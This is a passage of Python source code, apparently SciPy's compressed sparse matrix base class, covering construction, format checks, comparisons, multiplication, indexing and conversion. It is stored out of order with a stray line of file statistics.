copy=False)
# Sparse column vector times...
elif self.shape[1] == 1:
if other.shape[0] == 1: # Dense row vector.
data = np.multiply(ret.data[:, None], other)
elif other.shape[0] == self.shape[0]: # Dense matrix.
data = np.multiply(ret.data[:, None], other[ret.row])
else:
raise ValueError("inconsistent shapes")
row = np.repeat(ret.row, other.shape[1])
col = np.tile(np.arange(other.shape[1]), len(ret.col))
return coo_matrix((data.view(np.ndarray).ravel(), (row, col)),
shape=(self.shape[0], other.shape[1]),
copy=False)
# Sparse matrix times dense row vector.
elif other.shape[0] == 1 and self.shape[1] == other.shape[1]:
data = np.multiply(ret.data, other[:, ret.col].ravel())
# Sparse matrix times dense column vector.
elif other.shape[1] == 1 and self.shape[0] == other.shape[0]:
data = np.multiply(ret.data, other[ret.row].ravel())
else:
raise ValueError("inconsistent shapes")
ret.data = data.view(np.ndarray).ravel()
return ret
###########################
# Multiplication handlers #
###########################
def _mul_vector(self, other):
M, N = self.shape
# output array
result = np.zeros(M, dtype=upcast_char(self.dtype.char,
other.dtype.char))
# csr_matvec or csc_matvec
fn = getattr(_sparsetools, self.format + '_matvec')
fn(M, N, self.indptr, self.indices, self.data, other, result)
return result
def _mul_multivector(self, other):
M, N = self.shape
n_vecs = other.shape[1] # number of column vectors
result = np.zeros((M, n_vecs),
dtype=upcast_char(self.dtype.char, other.dtype.char))
# csr_matvecs or csc_matvecs
fn = getattr(_sparsetools, self.format + '_matvecs')
fn(M, N, n_vecs, self.indptr, self.indices, self.data,
other.ravel(), result.ravel())
return result
def _mul_sparse_matrix(self, other):
M, K1 = self.shape
K2, N = other.shape
major_axis = self._swap((M, N))[0]
other = self.__class__(other) # convert to this format
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices))
fn = getattr(_sparsetools, self.format + '_matmat_maxnnz')
nnz = fn(M, N,
np.asarray(self.indptr, dtype=idx_dtype),
np.asarray(self.indices, dtype=idx_dtype),
np.asarray(other.indptr, dtype=idx_dtype),
np.asarray(other.indices, dtype=idx_dtype))
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices),
maxval=nnz)
indptr = np.empty(major_axis + 1, dtype=idx_dtype)
indices = np.empty(nnz, dtype=idx_dtype)
data = np.empty(nnz, dtype=upcast(self.dtype, other.dtype))
fn = getattr(_sparsetools, self.format + '_matmat')
fn(M, N, np.asarray(self.indptr, dtype=idx_dtype),
np.asarray(self.indices, dtype=idx_dtype),
self.data,
np.asarray(other.indptr, dtype=idx_dtype),
np.asarray(other.indices, dtype=idx_dtype),
other.data,
indptr, indices, data)
return self.__class__((data, indices, indptr), shape=(M, N))
def diagonal(self, k=0):
rows, cols = self.shape
if k <= -rows or k >= cols:
raise ValueError("k exceeds matrix dimensions")
fn = getattr(_sparsetools, self.format + "_diagonal")
y = np.empty(min(rows + min(k, 0), cols - max(k, 0)),
dtype=upcast(self.dtype))
fn(k, self.shape[0], self.shape[1], self.indptr, self.indices,
self.data, y)
return y
diagonal.__doc__ = spmatrix.diagonal.__doc__
#####################
# Other binary ops #
#####################
def _maximum_minimum(self, other, npop, op_name, dense_check):
if isscalarlike(other):
if dense_check(other):
warn("Taking maximum (minimum) with > 0 (< 0) number results"
" to a dense matrix.", SparseEfficiencyWarning,
stacklevel=3)
other_arr = np.empty(self.shape, dtype=np.asarray(other).dtype)
other_arr.fill(other)
other_arr = self.__class__(other_arr)
return self._binopt(other_arr, op_name)
else:
self.sum_duplicates()
new_data = npop(self.data, np.asarray(other))
mat = self.__class__((new_data, self.indices, self.indptr),
dtype=new_data.dtype, shape=self.shape)
return mat
elif isdense(other):
return npop(self.todense(), other)
elif isspmatrix(other):
return self._binopt(other, op_name)
else:
raise ValueError("Operands not compatible.")
def maximum(self, other):
return self._maximum_minimum(other, np.maximum,
'_maximum_', lambda x: np.asarray(x) > 0)
maximum.__doc__ = spmatrix.maximum.__doc__
def minimum(self, other):
return self._maximum_minimum(other, np.minimum,
'_minimum_', lambda x: np.asarray(x) < 0)
minimum.__doc__ = spmatrix.minimum.__doc__
#####################
# Reduce operations #
#####################
def sum(self, axis=None, dtype=None, out=None):
"""Sum the matrix over the given axis. If the axis is None, sum
over both rows and columns, returning a scalar.
"""
# The spmatrix base class already does axis=0 and axis=1 efficiently
# so we only do the case axis=None here
if (not hasattr(self, 'blocksize') and
axis in self._swap(((1, -1), (0, 2)))[0]):
# faster than multiplication for large minor axis in CSC/CSR
res_dtype = get_sum_dtype(self.dtype)
ret = np.zeros(len(self.indptr) - 1, dtype=res_dtype)
major_index, value = self._minor_reduce(np.add)
ret[major_index] = value
ret = asmatrix(ret)
if axis % 2 == 1:
ret = ret.T
if out is not None and out.shape != ret.shape:
raise ValueError('dimensions do not match')
return ret.sum(axis=(), dtype=dtype, out=out)
# spmatrix will handle the remaining situations when axis
# is in {None, -1, 0, 1}
else:
return spmatrix.sum(self, axis=axis, dtype=dtype, out=out)
sum.__doc__ = spmatrix.sum.__doc__
def _minor_reduce(self, ufunc, data=None):
"""Reduce nonzeros with a ufunc over the minor axis when non-empty
Can be applied to a function of self.data by supplying data parameter.
Warning: this does not call sum_duplicates()
Returns
-------
major_index : array of ints
Major indices where nonzero
value : array of self.dtype
Reduce result for nonzeros in each major_index
"""
if data is None:
data = self.data
major_index = np.flatnonzero(np.diff(self.indptr))
value = ufunc.reduceat(data,
downcast_intp_index(self.indptr[major_index]))
return major_index, value
#######################
# Getting and Setting #
#######################
def _get_intXint(self, row, col):
M, N = self._swap(self.shape)
major, minor = self._swap((row, col))
indptr, indices, data = get_csr_submatrix(
M, N, self.indptr, self.indices, self.data,
major, major + 1, minor, minor + 1)
return data.sum(dtype=self.dtype)
def _get_sliceXslice(self, row, col):
major, minor = self._swap((row, col))
if major.step in (1, None) and minor.step in (1, None):
return self._get_submatrix(major, minor, copy=True)
return self._major_slice(major)._minor_slice(minor)
def _get_arrayXarray(self, row, col):
# inner indexing
idx_dtype = self.indices.dtype
M, N = self._swap(self.shape)
major, minor = self._swap((row, col))
major = np.asarray(major, dtype=idx_dtype)
minor = np.asarray(minor, dtype=idx_dtype)
val = np.empty(major.size, dtype=self.dtype)
csr_sample_values(M, N, self.indptr, self.indices, self.data,
major.size, major.ravel(), minor.ravel(), val)
if major.ndim == 1:
return asmatrix(val)
return self.__class__(val.reshape(major.shape))
def _get_columnXarray(self, row, col):
# outer indexing
major, minor = self._swap((row, col))
return self._major_index_fancy(major)._minor_index_fancy(minor)
def _major_index_fancy(self, idx):
"""Index along the major axis where idx is an array of ints.
"""
idx_dtype = self.indices.dtype
indices = np.asarray(idx, dtype=idx_dtype).ravel()
_, N = self._swap(self.shape)
M = len(indices)
new_shape = self._swap((M, N))
if M == 0:
return self.__class__(new_shape)
row_nnz = np.diff(self.indptr)
idx_dtype = self.indices.dtype
res_indptr = np.zeros(M+1, dtype=idx_dtype)
np.cumsum(row_nnz[idx], out=res_indptr[1:])
nnz = res_indptr[-1]
res_indices = np.empty(nnz, dtype=idx_dtype)
res_data = np.empty(nnz, dtype=self.dtype)
csr_row_index(M, indices, self.indptr, self.indices, self.data,
res_indices, res_data)
return self.__class__((res_data, res_indices, res_indptr),
shape=new_shape, copy=False)
def _major_slice(self, idx, copy=False):
"""Index along the major axis where idx is a slice object.
"""
if idx == slice(None):
return self.copy() if copy else self
M, N = self._swap(self.shape)
start, stop, step = idx.indices(M)
M = len(range(start, stop, step))
new_shape = self._swap((M, N))
if M == 0:
return self.__class__(new_shape)
row_nnz = np.diff(self.indptr)
idx_dtype = self.indices.dtype
res_indptr = np.zeros(M+1, dtype=idx_dtype)
np.cumsum(row_nnz[idx], out=res_indptr[1:])
if step == 1:
all_idx = slice(self.indptr[start], self.indptr[stop])
res_indices = np.array(self.indices[all_idx], copy=copy)
res_data = np.array(self.data[all_idx], copy=copy)
else:
nnz = res_indptr[-1]
res_indices = np.empty(nnz, dtype=idx_dtype)
res_data = np.empty(nnz, dtype=self.dtype)
csr_row_slice(start, stop, step, self.indptr, self.indices,
self.data, res_indices, res_data)
return self.__class__((res_data, res_indices, res_indptr),
shape=new_shape, copy=False)
def _minor_index_fancy(self, idx):
"""Index along the minor axis where idx is an array of ints.
"""
idx_dtype = self.indices.dtype
idx = np.asarray(idx, dtype=idx_dtype).ravel()
M, N = self._swap(self.shape)
k = len(idx)
new_shape = self._swap((M, k))
if k == 0:
return self.__class__(new_shape)
# pass 1: count idx entries and compute new indptr
col_offsets = np.zeros(N, dtype=idx_dtype)
res_indptr = np.empty_like(self.indptr)
csr_column_index1(k, idx, M, N, self.indptr, self.indices,
col_offsets, res_indptr)
# pass 2: copy indices/data for selected idxs
col_order = np.argsort(idx).astype(idx_dtype, copy=False)
nnz = res_indptr[-1]
res_indices = np.empty(nnz, dtype=idx_dtype)
res_data = np.empty(nnz, dtype=self.dtype)
csr_column_index2(col_order, col_offsets, len(self.indices),
self.indices, self.data, res_indices, res_data)
return self.__class__((res_data, res_indices, res_indptr),
shape=new_shape, copy=False)
def _minor_slice(self, idx, copy=False):
"""Index along the minor axis where idx is a slice object.
"""
if idx == slice(None):
return self.copy() if copy else self
M, N = self._swap(self.shape)
start, stop, step = idx.indices(N)
N = len(range(start, stop, step))
if N == 0:
return self.__class__(self._swap((M, N)))
if step == 1:
return self._get_submatrix(minor=idx, copy=copy)
# TODO: don't fall back to fancy indexing here
return self._minor_index_fancy(np.arange(start, stop, step))
def _get_submatrix(self, major=None, minor=None, copy=False):
"""Return a submatrix of this matrix.
major, minor: None, int, or slice with step 1
"""
M, N = self._swap(self.shape)
i0, i1 = _process_slice(major, M)
j0, j1 = _process_slice(minor, N)
if i0 == 0 and j0 == 0 and i1 == M and j1 == N:
return self.copy() if copy else self
indptr, indices, data = get_csr_submatrix(
M, N, self.indptr, self.indices, self.data, i0, i1, j0, j1)
shape = self._swap((i1 - i0, j1 - j0))
return self.__class__((data, indices, indptr), shape=shape,
dtype=self.dtype, copy=False)
def _set_intXint(self, row, col, x):
i, j = self._swap((row, col))
self._set_many(i, j, x)
def _set_arrayXarray(self, row, col, x):
i, j = self._swap((row, col))
self._set_many(i, j, x)
def _set_arrayXarray_sparse(self, row, col, x):
# clear entries that will be overwritten
self._zero_many(*self._swap((row, col)))
M, N = row.shape # matches col.shape
broadcast_row = M != 1 and x.shape[0] == 1
broadcast_col = N != 1 and x.shape[1] == 1
r, c = x.row, x.col
x = np.asarray(x.data, dtype=self.dtype)
if broadcast_row:
r = np.repeat(np.arange(M), len(r))
c = np.tile(c, M)
x = np.tile(x, M)
if broadcast_col:
r = np.repeat(r, N)
c = np.tile(np.arange(N), len(c))
x = np.repeat(x, N)
# only assign entries in the new sparsity structure
i, j = self._swap((row[r, c], col[r, c]))
self._set_many(i, j, x)
def _setdiag(self, values, k):
if 0 in self.shape:
return
M, N = self.shape
broadcast = (values.ndim == 0)
if k < 0:
if broadcast:
max_index = min(M + k, N)
else:
max_index = min(M + k, N, len(values))
i = np.arange(max_index, dtype=self.indices.dtype)
j = np.arange(max_index, dtype=self.indices.dtype)
i -= k
else:
if broadcast:
max_index = min(M, N - k)
else:
max_index = min(M, N - k, len(values))
i = np.arange(max_index, dtype=self.indices.dtype)
j = np.arange(max_index, dtype=self.indices.dtype)
j += k
if not broadcast:
values = values[:len(i)]
self[i, j] = values
def _prepare_indices(self, i, j):
M, N = self._swap(self.shape)
def check_bounds(indices, bound):
idx = indices.max()
if idx >= bound:
raise IndexError('index (%d) out of range (>= %d)' %
(idx, bound))
idx = indices.min()
if idx < -bound:
raise IndexError('index (%d) out of range (< -%d)' %
(idx, bound))
i = np.array(i, dtype=self.indices.dtype, copy=False, ndmin=1).ravel()
j = np.array(j, dtype=self.indices.dtype, copy=False, ndmin=1).ravel()
check_bounds(i, M)
check_bounds(j, N)
return i, j, M, N
def _set_many(self, i, j, x):
"""Sets value at each (i, j) to x
Here (i,j) index major and minor respectively, and must not contain
duplicate entries.
"""
i, j, M, N = self._prepare_indices(i, j)
x = np.array(x, dtype=self.dtype, copy=False, ndmin=1).ravel()
n_samples = x.size
offsets = np.empty(n_samples, dtype=self.indices.dtype)
ret = csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
if ret == 1:
# rinse and repeat
self.sum_duplicates()
csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
if -1 not in offsets:
# only affects existing non-zero cells
self.data[offsets] = x
return
else:
warn("Changing the sparsity structure of a {}_matrix is expensive."
" lil_matrix is more efficient.".format(self.format),
SparseEfficiencyWarning, stacklevel=3)
# replace where possible
mask = offsets > -1
self.data[offsets[mask]] = x[mask]
# only insertions remain
mask = ~mask
i = i[mask]
i[i < 0] += M
j = j[mask]
j[j < 0] += N
self._insert_many(i, j, x[mask])
def _zero_many(self, i, j):
"""Sets value at each (i, j) to zero, preserving sparsity structure.
Here (i,j) index major and minor respectively.
"""
i, j, M, N = self._prepare_indices(i, j)
n_samples = len(i)
offsets = np.empty(n_samples, dtype=self.indices.dtype)
ret = csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
if ret == 1:
# rinse and repeat
self.sum_duplicates()
csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
# only assign zeros to the existing sparsity structure
self.data[offsets[offsets > -1]] = 0
def _insert_many(self, i, j, x):
"""Inserts new nonzero at each (i, j) with value x
Here (i,j) index major and minor respectively.
i, j and x must be non-empty, 1d arrays.
Inserts each major group (e.g. all entries per row) at a time.
Maintains has_sorted_indices property.
Modifies i, j, x in place.
"""
order = np.argsort(i, kind='mergesort') # stable for duplicates
i = i.take(order, mode='clip')
j = j.take(order, mode='clip')
x = x.take(order, mode='clip')
do_sort = self.has_sorted_indices
# Update index data type
idx_dtype = get_index_dtype((self.indices, self.indptr),
maxval=(self.indptr[-1] + x.size))
self.indptr = np.asarray(self.indptr, dtype=idx_dtype)
self.indices = np.asarray(self.indices, dtype=idx_dtype)
i = np.asarray(i, dtype=idx_dtype)
j = np.asarray(j, dtype=idx_dtype)
# Collate old and new in chunks by major index
indices_parts = []
data_parts = []
ui, ui_indptr = np.unique(i, return_index=True)
ui_indptr = np.append(ui_indptr, len(j))
new_nnzs = np.diff(ui_indptr)
prev = 0
for c, (ii, js, je) in enumerate(zip(ui, ui_indptr, ui_indptr[1:])):
# old entries
start = self.indptr[prev]
stop = self.indptr[ii]
indices_parts.append(self.indices[start:stop])
data_parts.append(self.data[start:stop])
# handle duplicate j: keep last setting
uj, uj_indptr = np.unique(j[js:je][::-1], return_index=True)
if len(uj) == je - js:
indices_parts.append(j[js:je])
data_parts.append(x[js:je])
else:
indices_parts.append(j[js:je][::-1][uj_indptr])
data_parts.append(x[js:je][::-1][uj_indptr])
new_nnzs[c] = len(uj)
prev = ii
# remaining old entries
start = self.indptr[ii]
indices_parts.append(self.indices[start:])
data_parts.append(self.data[start:])
# update attributes
self.indices = np.concatenate(indices_parts)
self.data = np.concatenate(data_parts)
nnzs = np.empty(self.indptr.shape, dtype=idx_dtype)
nnzs[0] = idx_dtype(0)
indptr_diff = np.diff(self.indptr)
indptr_diff[ui] += new_nnzs
nnzs[1:] = indptr_diff
self.indptr = np.cumsum(nnzs, out=nnzs)
if do_sort:
# TODO: only sort where necessary
self.has_sorted_indices = False
self.sort_indices()
self.check_format(full_check=False)
######################
# Conversion methods #
######################
def tocoo(self, copy=True):
major_dim, minor_dim = self._swap(self.shape)
minor_indices = self.indices
major_indices = np.empty(len(minor_indices), dtype=self.indices.dtype)
_sparsetools.expandptr(major_dim, self.indptr, major_indices)
row, col = self._swap((major_indices, minor_indices))
from .coo import coo_matrix
return coo_matrix((self.data, (row, col)), self.shape, copy=copy,
dtype=self.dtype)
tocoo.__doc__ = spmatrix.tocoo.__doc__
def toarray(self, order=None, out=None):
if out is None and order is None:
order = self._swap('cf')[0]
out = self._process_toarray_args(order, out)
if not (out.flags.c_contiguous or out.flags.f_contiguous):
raise ValueError('Output array must be C or F contiguous')
# align ideal order with output array order
if out.flags.c_contiguous:
x = self.tocsr()
y = out
else:
x = self.tocsc()
y = out.T
M, N = x._swap(x.shape)
csr_todense(M, N, x.indptr, x.indices, x.data, y)
return out
toarray.__doc__ = spmatrix.toarray.__doc__
##############################################################
# methods that examine or modify the internal data structure #
##############################################################
def eliminate_zeros(self):
"""Remove zero entries from the matrix
This is an *in place* operation
"""
M, N = self._swap(self.shape)
_sparsetools.csr_eliminate_zeros(M, N, self.indptr, self.indices,
self.data)
self.prune() # nnz may have changed
def __get_has_canonical_format(self):
"""Determine whether the matrix has sorted indices and no duplicates
Returns
- True: if the above applies
- False: otherwise
has_canonical_format implies has_sorted_indices, so if the latter flag
is False, so will the former be; if the former is found True, the
latter flag is also set.
"""
# first check to see if result was cached
if not getattr(self, '_has_sorted_indices', True):
# not sorted => not canonical
self._has_canonical_format = False
elif not hasattr(self, '_has_canonical_format'):
self.has_canonical_format = _sparsetools.csr_has_canonical_format(
len(self.indptr) - 1, self.indptr, self.indices)
return self._has_canonical_format
def __set_has_canonical_format(self, val):
self._has_canonical_format = bool(val)
if val:
self.has_sorted_indices = True
has_canonical_format = property(fget=__get_has_canonical_format,
fset=__set_has_canonical_format)
def sum_duplicates(self):
"""Eliminate duplicate matrix entries by adding them together
The is an *in place* operation
"""
if self.has_canonical_format:
return
self.sort_indices()
M, N = self._swap(self.shape)
_sparsetools.csr_sum_duplicates(M, N, self.indptr, self.indices,
self.data)
self.prune() # nnz may have changed
self.has_canonical_format = True
def __get_sorted(self):
"""Determine whether the matrix has sorted indices
Returns
- True: if the indices of the matrix are in sorted order
- False: otherwise
"""
# first check to see if result was cached
if not hasattr(self, '_has_sorted_indices'):
self._has_sorted_indices = _sparsetools.csr_has_sorted_indices(
len(self.indptr) - 1, self.indptr, self.indices)
return self._has_sorted_indices
def __set_sorted(self, val):
self._has_sorted_indices = bool(val)
has_sorted_indices = property(fget=__get_sorted, fset=__set_sorted)
def sorted_indices(self):
"""Return a copy of this matrix with sorted indices
"""
A = self.copy()
A.sort_indices()
return A
# an alternative that has linear complexity is the following
# although the previous option is typically faster
# return self.toother().toother()
def sort_indices(self):
"""Sort the indices of this matrix *in place*
"""
if not self.has_sorted_indices:
_sparsetools.csr_sort_indices(len(self.indptr) - 1, self.indptr,
self.indices, self.data)
self.has_sorted_indices = True
def prune(self):
"""Remove empty space after all non-zero elements.
"""
major_dim = self._swap(self.shape)[0]
if len(self.indptr) != major_dim + 1:
raise ValueError('index pointer has invalid length')
if len(self.indices) < self.nnz:
raise ValueError('indices array has fewer than nnz elements')
if len(self.data) < self.nnz:
raise ValueError('data array has fewer than nnz elements')
self.indices = _prune_array(self.indices[:self.nnz])
self.data = _prune_array(self.data[:self.nnz])
def resize(self, *shape):
shape = check_shape(shape)
if hasattr(self, 'blocksize'):
bm, bn = self.blocksize
new_M, rm = divmod(shape[0], bm)
new_N, rn = divmod(shape[1], bn)
if rm or rn:
raise ValueError("shape must be divisible into %s blocks. "
"Got %s" % (self.blocksize, shape))
M, N = self.shape[0] // bm, self.shape[1] // bn
else:
new_M, new_N = self._swap(shape)
M, N = self._swap(self.shape)
if new_M < M:
self.indices = self.indices[:self.indptr[new_M]]
self.data = self.data[:self.indptr[new_M]]
self.indptr = self.indptr[:new_M + 1]
elif new_M > M:
self.indptr = np.resize(self.indptr, new_M + 1)
self.indptr[M + 1:].fill(self.indptr[M])
if new_N < N:
mask = self.indices < new_N
if not np.all(mask):
self.indices = self.indices[mask]
self.data = self.data[mask]
major_index, val = self._minor_reduce(np.add, mask)
self.indptr.fill(0)
self.indptr[1:][major_index] = val
np.cumsum(self.indptr, out=self.indptr)
self._shape = shape
resize.__doc__ = spmatrix.resize.__doc__
###################
# utility methods #
###################
# needed by _data_matrix
def _with_data(self, data, copy=True):
"""Returns a matrix with the same sparsity structure as self,
but with different data. By default the structure arrays
(i.e. .indptr and .indices) are copied.
"""
if copy:
return self.__class__((data, self.indices.copy(),
self.indptr.copy()),
shape=self.shape,
dtype=data.dtype)
else:
return self.__class__((data, self.indices, self.indptr),
shape=self.shape, dtype=data.dtype)
def _binopt(self, other, op):
"""apply the binary operation fn to two sparse matrices."""
other = self.__class__(other)
# e.g. csr_plus_csr, csr_minus_csr, etc.
fn = getattr(_sparsetools, self.format + op + self.format)
maxnnz = self.nnz + other.nnz
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices),
maxval=maxnnz)
indptr = np.empty(self.indptr.shape, dtype=idx_dtype)
indices = np.empty(maxnnz, dtype=idx_dtype)
bool_ops = ['_ne_', '_lt_', '_gt_', '_le_', '_ge_']
if op in bool_ops:
data = np.empty(maxnnz, dtype=np.bool_)
else:
data = np.empty(maxnnz, dtype=upcast(self.dtype, other.dtype))
fn(self.shape[0], self.shape[1],
np.asarray(self.indptr, dtype=idx_dtype),
np.asarray(self.indices, dtype=idx_dtype),
self.data,
np.asarray(other.indptr, dtype=idx_dtype),
np.asarray(other.indices, dtype=idx_dtype),
other.data,
indptr, indices, data)
A = self.__class__((data, indices, indptr), shape=self.shape)
A.prune()
return A
def _divide_sparse(self, other):
"""
Divide this matrix by a second sparse matrix.
"""
if other.shape != self.shape:
raise ValueError('inconsistent shapes')
r = self._binopt(other, '_eldiv_')
if np.issubdtype(r.dtype, np.inexact):
# Eldiv leaves entries outside the combined sparsity
# pattern empty, so they must be filled manually.
# Everything outside of other's sparsity is NaN, and everything
# inside it is either zero or defined by eldiv.
out = np.empty(self.shape, dtype=self.dtype)
out.fill(np.nan)
row, col = other.nonzero()
out[row, col] = 0
r = r.tocoo()
out[r.row, r.col] = r.data
out = matrix(out)
else:
# integers types go with nan <-> 0
out = r
return out
def _process_slice(sl, num):
if sl is None:
i0, i1 = 0, num
elif isinstance(sl, slice):
i0, i1, stride = sl.indices(num)
if stride != 1:
raise ValueError('slicing with step != 1 not supported')
i0 = min(i0, i1) # give an empty slice when i0 > i1
elif isintlike(sl):
if sl < 0:
sl += num
i0, i1 = sl, sl + 1
if i0 < 0 or i1 > num:
raise IndexError('index out of bounds: 0 <= %d < %d <= %d' %
(i0, i1, num))
else:
raise TypeError('expected slice or scalar')
return i0, i1
| 39.039443 | 79 | 0.54398 | from __future__ import division, print_function, absolute_import
__all__ = []
from warnings import warn
import operator
import numpy as np
from scipy._lib._util import _prune_array
from .base import spmatrix, isspmatrix, SparseEfficiencyWarning
from .data import _data_matrix, _minmax_mixin
from .dia import dia_matrix
from . import _sparsetools
from ._sparsetools import (get_csr_submatrix, csr_sample_offsets, csr_todense,
csr_sample_values, csr_row_index, csr_row_slice,
csr_column_index1, csr_column_index2)
from ._index import IndexMixin
from .sputils import (upcast, upcast_char, to_native, isdense, isshape,
getdtype, isscalarlike, isintlike, get_index_dtype,
downcast_intp_index, get_sum_dtype, check_shape,
matrix, asmatrix, is_pydata_spmatrix)
class _cs_matrix(_data_matrix, _minmax_mixin, IndexMixin):
def __init__(self, arg1, shape=None, dtype=None, copy=False):
_data_matrix.__init__(self)
if isspmatrix(arg1):
if arg1.format == self.format and copy:
arg1 = arg1.copy()
else:
arg1 = arg1.asformat(self.format)
self._set_self(arg1)
elif isinstance(arg1, tuple):
if isshape(arg1):
# create empty matrix
self._shape = check_shape(arg1)
M, N = self.shape
# Select index dtype large enough to pass array and
# scalar parameters to sparsetools
idx_dtype = get_index_dtype(maxval=max(M, N))
self.data = np.zeros(0, getdtype(dtype, default=float))
self.indices = np.zeros(0, idx_dtype)
self.indptr = np.zeros(self._swap((M, N))[0] + 1,
dtype=idx_dtype)
else:
if len(arg1) == 2:
# (data, ij) format
from .coo import coo_matrix
other = self.__class__(coo_matrix(arg1, shape=shape))
self._set_self(other)
elif len(arg1) == 3:
# (data, indices, indptr) format
(data, indices, indptr) = arg1
# Select index dtype large enough to pass array and
# scalar parameters to sparsetools
maxval = None
if shape is not None:
maxval = max(shape)
idx_dtype = get_index_dtype((indices, indptr),
maxval=maxval,
check_contents=True)
self.indices = np.array(indices, copy=copy,
dtype=idx_dtype)
self.indptr = np.array(indptr, copy=copy, dtype=idx_dtype)
self.data = np.array(data, copy=copy, dtype=dtype)
else:
raise ValueError("unrecognized {}_matrix "
"constructor usage".format(self.format))
else:
# must be dense
try:
arg1 = np.asarray(arg1)
except Exception:
raise ValueError("unrecognized {}_matrix constructor usage"
"".format(self.format))
from .coo import coo_matrix
self._set_self(self.__class__(coo_matrix(arg1, dtype=dtype)))
# Read matrix dimensions given, if any
if shape is not None:
self._shape = check_shape(shape)
else:
if self.shape is None:
# shape not already set, try to infer dimensions
try:
major_dim = len(self.indptr) - 1
minor_dim = self.indices.max() + 1
except Exception:
raise ValueError('unable to infer matrix dimensions')
else:
self._shape = check_shape(self._swap((major_dim,
minor_dim)))
if dtype is not None:
self.data = self.data.astype(dtype, copy=False)
self.check_format(full_check=False)
def getnnz(self, axis=None):
if axis is None:
return int(self.indptr[-1])
else:
if axis < 0:
axis += 2
axis, _ = self._swap((axis, 1 - axis))
_, N = self._swap(self.shape)
if axis == 0:
return np.bincount(downcast_intp_index(self.indices),
minlength=N)
elif axis == 1:
return np.diff(self.indptr)
raise ValueError('axis out of bounds')
getnnz.__doc__ = spmatrix.getnnz.__doc__
def _set_self(self, other, copy=False):
if copy:
other = other.copy()
self.data = other.data
self.indices = other.indices
self.indptr = other.indptr
self._shape = check_shape(other.shape)
def check_format(self, full_check=True):
# use _swap to determine proper bounds
major_name, minor_name = self._swap(('row', 'column'))
major_dim, minor_dim = self._swap(self.shape)
# index arrays should have integer data types
if self.indptr.dtype.kind != 'i':
warn("indptr array has non-integer dtype ({})"
"".format(self.indptr.dtype.name), stacklevel=3)
if self.indices.dtype.kind != 'i':
warn("indices array has non-integer dtype ({})"
"".format(self.indices.dtype.name), stacklevel=3)
idx_dtype = get_index_dtype((self.indptr, self.indices))
self.indptr = np.asarray(self.indptr, dtype=idx_dtype)
self.indices = np.asarray(self.indices, dtype=idx_dtype)
self.data = to_native(self.data)
# check array shapes
for x in [self.data.ndim, self.indices.ndim, self.indptr.ndim]:
if x != 1:
raise ValueError('data, indices, and indptr should be 1-D')
# check index pointer
if (len(self.indptr) != major_dim + 1):
raise ValueError("index pointer size ({}) should be ({})"
"".format(len(self.indptr), major_dim + 1))
if (self.indptr[0] != 0):
raise ValueError("index pointer should start with 0")
# check index and data arrays
if (len(self.indices) != len(self.data)):
raise ValueError("indices and data should have the same size")
if (self.indptr[-1] > len(self.indices)):
raise ValueError("Last value of index pointer should be less than "
"the size of index and data arrays")
self.prune()
if full_check:
# check format validity (more expensive)
if self.nnz > 0:
if self.indices.max() >= minor_dim:
raise ValueError("{} index values must be < {}"
"".format(minor_name, minor_dim))
if self.indices.min() < 0:
raise ValueError("{} index values must be >= 0"
"".format(minor_name))
if np.diff(self.indptr).min() < 0:
raise ValueError("index pointer values must form a "
"non-decreasing sequence")
# if not self.has_sorted_indices():
# warn('Indices were not in sorted order. Sorting indices.')
# self.sort_indices()
# assert(self.has_sorted_indices())
# TODO check for duplicates?
#######################
# Boolean comparisons #
#######################
def _scalar_binopt(self, other, op):
self.sum_duplicates()
res = self._with_data(op(self.data, other), copy=True)
res.eliminate_zeros()
return res
def __eq__(self, other):
# Scalar other.
if isscalarlike(other):
if np.isnan(other):
return self.__class__(self.shape, dtype=np.bool_)
if other == 0:
warn("Comparing a sparse matrix with 0 using == is inefficient"
", try using != instead.", SparseEfficiencyWarning,
stacklevel=3)
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
inv = self._scalar_binopt(other, operator.ne)
return all_true - inv
else:
return self._scalar_binopt(other, operator.eq)
# Dense other.
elif isdense(other):
return self.todense() == other
# Pydata sparse other.
elif is_pydata_spmatrix(other):
return NotImplemented
# Sparse other.
elif isspmatrix(other):
warn("Comparing sparse matrices using == is inefficient, try using"
" != instead.", SparseEfficiencyWarning, stacklevel=3)
# TODO sparse broadcasting
if self.shape != other.shape:
return False
elif self.format != other.format:
other = other.asformat(self.format)
res = self._binopt(other, '_ne_')
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
return all_true - res
else:
return False
def __ne__(self, other):
# Scalar other.
if isscalarlike(other):
if np.isnan(other):
warn("Comparing a sparse matrix with nan using != is"
" inefficient", SparseEfficiencyWarning, stacklevel=3)
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
return all_true
elif other != 0:
warn("Comparing a sparse matrix with a nonzero scalar using !="
" is inefficient, try using == instead.",
SparseEfficiencyWarning, stacklevel=3)
all_true = self.__class__(np.ones(self.shape), dtype=np.bool_)
inv = self._scalar_binopt(other, operator.eq)
return all_true - inv
else:
return self._scalar_binopt(other, operator.ne)
# Dense other.
elif isdense(other):
return self.todense() != other
# Pydata sparse other.
elif is_pydata_spmatrix(other):
return NotImplemented
# Sparse other.
elif isspmatrix(other):
# TODO sparse broadcasting
if self.shape != other.shape:
return True
elif self.format != other.format:
other = other.asformat(self.format)
return self._binopt(other, '_ne_')
else:
return True
def _inequality(self, other, op, op_name, bad_scalar_msg):
# Scalar other.
if isscalarlike(other):
if 0 == other and op_name in ('_le_', '_ge_'):
raise NotImplementedError(" >= and <= don't work with 0.")
elif op(0, other):
warn(bad_scalar_msg, SparseEfficiencyWarning)
other_arr = np.empty(self.shape, dtype=np.result_type(other))
other_arr.fill(other)
other_arr = self.__class__(other_arr)
return self._binopt(other_arr, op_name)
else:
return self._scalar_binopt(other, op)
elif isdense(other):
return op(self.todense(), other)
elif isspmatrix(other):
if self.shape != other.shape:
raise ValueError("inconsistent shapes")
elif self.format != other.format:
other = other.asformat(self.format)
if op_name not in ('_ge_', '_le_'):
return self._binopt(other, op_name)
warn("Comparing sparse matrices using >= and <= is inefficient, "
"using <, >, or !=, instead.", SparseEfficiencyWarning)
